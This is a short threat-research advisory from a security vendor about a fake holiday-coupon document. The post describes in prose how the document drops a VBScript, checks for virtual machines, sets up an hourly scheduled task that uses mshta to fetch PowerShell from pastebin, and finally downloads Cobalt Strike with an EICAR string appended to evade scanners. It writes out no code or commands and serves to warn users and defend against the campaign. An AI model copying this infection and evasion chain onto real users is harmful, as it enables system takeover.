Fake coupon downloads Cobalt Strike to take control of your system

November 30, 2017

With the holiday shopping season in full swing, cybercriminals are taking advantage of the fact that consumers are expected to shop for great deals over the next few weeks. During this Cyber sales week, the SonicWall Capture Labs Threat Research Team has spotted a specially crafted document file pretending to be a coupon that will save you big bucks on all items with major online retailers like amazon, ebay and aliexpress. In this infection, multiple levels of scripts are being executed and downloaded to carry on the full attack.

Infection cycle:

The file arrives as a document file.

The text on the file asks the user to click on the image to access a coupon. Doing so, will launch a VBScript file named "Coupon code .vbs"

This script checks if it is being executed in a virtual environment and will terminate. It then spawns schtasks.exe to add a scheduled task named "GooleServices_updaters."

The scheduled task tries to visit a page on pastebin every hour using mshta.exe, a Microsoft windows file used to launch html applications. This page contains another powershell script.

This powershell script, launches another instance of powershell which then downloads a Cobalt Strike client.

The downloaded Cobalt Stike file has the eicar test file string appended to it possibly in an attempt to throw off malware detection.

Cobalt Strike is a threat emulation software designed for penetration testers and from here, the attacker can then take control of the victim's machine and penetrate the network by intiating a wide array of commands. Thus, it has become popular with malware authors as well.

Because of the prevalance of these types of malware attacks specially during the holiday season, we urge our users to always be vigilant and cautious with any unsolicited email with unsuspecting document attachments, particularly if you are not certain of the source.

Sonicwall Capture Labs provide protection against this threat with the following signature:

  • GAV: Coupon.VBS (Trojan)